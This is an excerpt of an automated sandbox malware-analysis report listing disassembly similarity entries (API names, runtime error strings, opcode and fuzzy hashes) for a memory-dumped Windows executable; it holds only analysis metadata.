                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Value$AllocCloseCurrentHandleSleepThread_endthreadex
                            • String ID:
                            • API String ID: 3976303954-0
                            • Opcode ID: ea43221ab5f7699fe539192792c55fb37b5c0e667665e417db95a27c9f4bd0b3
                            • Instruction ID: b66de51c9960e904f03b77e3d2179bbbf55b448712317098f61fffed1803fc03
                            • Opcode Fuzzy Hash: ea43221ab5f7699fe539192792c55fb37b5c0e667665e417db95a27c9f4bd0b3
                            • Instruction Fuzzy Hash: 66415166A08BC285EB44BF22D8451F8A360EF84B94F8D4532D92E4F3A9DF3CF4519320
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: _errno$_findclose
                            • String ID:
                            • API String ID: 237123889-0
                            • Opcode ID: d4c2707c31b7639645119803737304085e8bd4bbcb48388b01ad83bc1531672f
                            • Instruction ID: defed10be00ded020e958f175c8b106847e512e7d02e22d44ba9810e732cb31d
                            • Opcode Fuzzy Hash: d4c2707c31b7639645119803737304085e8bd4bbcb48388b01ad83bc1531672f
                            • Instruction Fuzzy Hash: D2115E72D1978245FAA07E24A8553F9A150AB80774FCD0730DB7D8F2C2DE3C78A5AA31
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: _errno$fflush
                            • String ID:
                            • API String ID: 3480992530-0
                            • Opcode ID: 5ca159c11e492a165e49e7e4847b7b79c0e40f690da1d9bb67617af004b83946
                            • Instruction ID: bbfd8cd051b49760568e46965654b8f84569f41d0801ce42a6f4d38dd836d8fa
                            • Opcode Fuzzy Hash: 5ca159c11e492a165e49e7e4847b7b79c0e40f690da1d9bb67617af004b83946
                            • Instruction Fuzzy Hash: BCF08673B0564985FB023F26AD00369A6585F54BD5F8D8430CE0C47394DF3C68868A20
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CloseHandleValue$_endthreadexlongjmp
                            • String ID:
                            • API String ID: 3990644698-0
                            • Opcode ID: 2d294d418596b905a4ed24bd3e2d8327b9d3b77180a0ba929c166903292c0a49
                            • Instruction ID: b5fd184e7b6bdf2f6b292536b5ccc61fdef741219999ec86ed0704200aa4b98e
                            • Opcode Fuzzy Hash: 2d294d418596b905a4ed24bd3e2d8327b9d3b77180a0ba929c166903292c0a49
                            • Instruction Fuzzy Hash: DA117062A09B8282F754AF21D4143B8B7A4EF44B58F9D4035CA0D8F298EF3CB894D320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_write
                            • String ID: *** buffer overflow detected ***: terminated
                            • API String ID: 483568592-381091186
                            • Opcode ID: 51fa19411ab82c54742be8eb4a36d6b61994e59c068640f3eb8eebead229f7f5
                            • Instruction ID: 7a13c521366accc88d22cba5bed0d80d0e98a172d7101cb5dec85121c250e09d
                            • Opcode Fuzzy Hash: 51fa19411ab82c54742be8eb4a36d6b61994e59c068640f3eb8eebead229f7f5
                            • Instruction Fuzzy Hash: 3CE0C240B28A8282F6043B91E8193F48221AF46381FEC0036C90E8F2E6CF1CEC068320
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: fputc
                            • String ID:
                            • API String ID: 1992160199-0
                            • Opcode ID: 5dc8d89df1790d37378db0413e4b0b2fd2a5a3db3eb330dad4d9800fb9ceb6df
                            • Instruction ID: 8bbb71548e1c195787dc0d2550be36ba1ac34164d4918ead32a4271e2788b1e3
                            • Opcode Fuzzy Hash: 5dc8d89df1790d37378db0413e4b0b2fd2a5a3db3eb330dad4d9800fb9ceb6df
                            • Instruction Fuzzy Hash: 8DE1D962F183C186F761AE3594047B9A691BB54768FAC8234CE5D5FBC4CE3CF891A720
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: ?$]${default arg#$}::
                            • API String ID: 0-2946519879
                            • Opcode ID: ee5554b2d81bdab14f6412d413fb267adc60d26e5b0b1c0f9e483fb768fb14ce
                            • Instruction ID: 591919f695f393b57e2208196c59256d73be02e9399ad82bb0f0a1367ca87f3d
                            • Opcode Fuzzy Hash: ee5554b2d81bdab14f6412d413fb267adc60d26e5b0b1c0f9e483fb768fb14ce
                            • Instruction Fuzzy Hash: 31E174736086C686E765AF25E4003FAA791EB15748F4C8031DB990B78ADF7DF8A1D320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid$cannot make absolute path
                            • API String ID: 39653677-136944737
                            • Opcode ID: d34ad072b372942f945a3f858fcb43ebc4f2142a26bca6a709731bdc01d135b5
                            • Instruction ID: 62889be618353f097772fea632824adcc8f424efd13e4fb3a228c0df3b107a47
                            • Opcode Fuzzy Hash: d34ad072b372942f945a3f858fcb43ebc4f2142a26bca6a709731bdc01d135b5
                            • Instruction Fuzzy Hash: 03719CA3658FC181EB15AB29D4406ADA7A1FB48BD4F988232DE9D87798CF3CD551C320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: memcpystrlenwcslen
                            • String ID: basic_string: construction from null is not valid
                            • API String ID: 339887217-2991274800
                            • Opcode ID: ee0a15962733cd6be46b0cfe46d0529113fddc12ae4c4c692baa4271d1cf6cc2
                            • Instruction ID: 9f06e6168720fbaa0e3b80227c8bd93e5b9ab925738763974496142ca53655db
                            • Opcode Fuzzy Hash: ee0a15962733cd6be46b0cfe46d0529113fddc12ae4c4c692baa4271d1cf6cc2
                            • Instruction Fuzzy Hash: 10518162B19B8581EA61AF1AE4401EEA760FB85BC4B8C0436DF5D4B7A4DF3CF561D320
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::erase
                            • API String ID: 0-2652434754
                            • Opcode ID: a6ed99d05c4ec3ed9b6625b9c63c8241ef03aee66a7296faccbe8c03d7e2857e
                            • Instruction ID: 1a93411c2818797872d04611b74e54b9399a95e1959f628d5a1ccb71d5db31df
                            • Opcode Fuzzy Hash: a6ed99d05c4ec3ed9b6625b9c63c8241ef03aee66a7296faccbe8c03d7e2857e
                            • Instruction Fuzzy Hash: 5951D362F19EC684EA11BA2AD4081EDA760BB55BD4FDC8132EF1C973A9DF2CD481C710
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Time$FileSystem
                            • String ID:
                            • API String ID: 2086374402-0
                            • Opcode ID: 4c7bb2ea5a7f13e440b759daf60424618d74bb11b2d503af90d6a8e5e9a6f5d7
                            • Instruction ID: 68d09f7e0f70f0366b9ea5a600c15b5a124fd94bee2576e58a0a231e75356023
                            • Opcode Fuzzy Hash: 4c7bb2ea5a7f13e440b759daf60424618d74bb11b2d503af90d6a8e5e9a6f5d7
                            • Instruction Fuzzy Hash: 34418822B097C386FB65BE2594083F5A291EF46B54F9C8135CA1D8E3C5EE3CF8959360
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: setlocale
                            • String ID:
                            • API String ID: 1598674530-0
                            • Opcode ID: aff991b8307e3bcd5e05f65fa1101b974062e933480d9ca02d7098501e92c03a
                            • Instruction ID: a1384c2c13f3e51b9d66241a33b90b92124859f71acbcde10af4c0825da29508
                            • Opcode Fuzzy Hash: aff991b8307e3bcd5e05f65fa1101b974062e933480d9ca02d7098501e92c03a
                            • Instruction Fuzzy Hash: D921D796B286C645EA20FF3269145FAD6456B89BD0FCC4135FE9C8F79ACE3CE1019220
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Value$AllocEventResetSleep
                            • String ID:
                            • API String ID: 412878532-0
                            • Opcode ID: a77759085a2798cfe768771cd9e11271f62b6a3e6ad3c4b997ad4b253fdac30c
                            • Instruction ID: a6a6bb95660b3f9cf1f197437c34d6b7173ff33d00acdc7e1c5019c7065a9095
                            • Opcode Fuzzy Hash: a77759085a2798cfe768771cd9e11271f62b6a3e6ad3c4b997ad4b253fdac30c
                            • Instruction Fuzzy Hash: 0611AC22F4A7C289FA557FA5A8061F8D290AF44794F8C0430D91E4E2D6DE1C78A2A230
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CriticalSection$Leave$EnterReleaseSemaphore
                            • String ID:
                            • API String ID: 2813224205-0
                            • Opcode ID: 45aee73af9dbdd27c35d892e7cd78c938b9d46a7dfe3719c238f2e86feb83cb6
                            • Instruction ID: 6e50935f122ed998351877a64a372abe4745bd379fb2b2e88d69f320ddade9db
                            • Opcode Fuzzy Hash: 45aee73af9dbdd27c35d892e7cd78c938b9d46a7dfe3719c238f2e86feb83cb6
                            • Instruction Fuzzy Hash: B001D623B05A8646F7556F6ABD842B8C281AF99BF2F8C4130CE0DC6280DE2C98D68210
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: setlocale$memcpystrlen
                            • String ID:
                            • API String ID: 4096897932-0
                            • Opcode ID: 4902d4598cf9db4a7ffe8d6b90e375a5c80990586321391b503546af71d20fc7
                            • Instruction ID: 1d21303d55d0ce73805b3f0ff8821bb3d074c4851cadb87d9f8abdc3ce7c8f2d
                            • Opcode Fuzzy Hash: 4902d4598cf9db4a7ffe8d6b90e375a5c80990586321391b503546af71d20fc7
                            • Instruction Fuzzy Hash: C1018442B3929610E969BA632D158FEC2412F4AFD4FCC8075BD0DAF786DD3CE0425310
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: setlocale$memcpystrlen
                            • String ID:
                            • API String ID: 4096897932-0
                            • Opcode ID: b446c8178b5d9df0beddbd8f31e3690ad96c84483da5d378e3155e5bc6b453c2
                            • Instruction ID: b1173d44d76dd7fdd59734879a7faaa329ce777096dc74772595594413fc936f
                            • Opcode Fuzzy Hash: b446c8178b5d9df0beddbd8f31e3690ad96c84483da5d378e3155e5bc6b453c2
                            • Instruction Fuzzy Hash: B2017182B2969510EA29BA632D199FE86452B4AFD4ECC8075FD0D5F7C6DD38E0425310
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Process$CloseCurrentHandleOpen
                            • String ID:
                            • API String ID: 2750122171-0
                            • Opcode ID: e3aef519a65d9c36dbc1b3517af97b1e481935a9b525b25f8dc147e3dadda337
                            • Instruction ID: 40b64d54484b7b3c2d5714f99bbc8e06a2a2a366687bfa6216a15c0cd4a91210
                            • Opcode Fuzzy Hash: e3aef519a65d9c36dbc1b3517af97b1e481935a9b525b25f8dc147e3dadda337
                            • Instruction Fuzzy Hash: E9F05456F19BC382FBA87F6094582B4A2909F84721F9C0535CA1ECD3E6DF2C74D55230
                            APIs
                            • VirtualProtect.KERNEL32(00007FF75F9D0040,00007FF75F9D0048,00000000,?,?,?,?,?,00007FF75F8B1224,?,?,?,00007FF75F8B13F6), ref: 00007FF75F8BEEBD
                            Strings
                            • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF75F8BF02A
                            • Unknown pseudo relocation bit size %d., xrefs: 00007FF75F8BF014
                            • Unknown pseudo relocation protocol version %d., xrefs: 00007FF75F8BF036
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                            • API String ID: 544645111-1286557213
                            • Opcode ID: 0c2fc76a629edb5ad7c483648d2aacfa8ff99de871e4031334d0112cd1b60417
                            • Instruction ID: 1a4cc6c9f13d25ed2ce2b758343011abf78b15a29bbcc09a1175f103e2778216
                            • Opcode Fuzzy Hash: 0c2fc76a629edb5ad7c483648d2aacfa8ff99de871e4031334d0112cd1b60417
                            • Instruction Fuzzy Hash: D391A522F095928AEA106B24D4406F9E350BF54764FDC8231DD6D5BBE8DF3CFC62A660
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strerrorstrlen
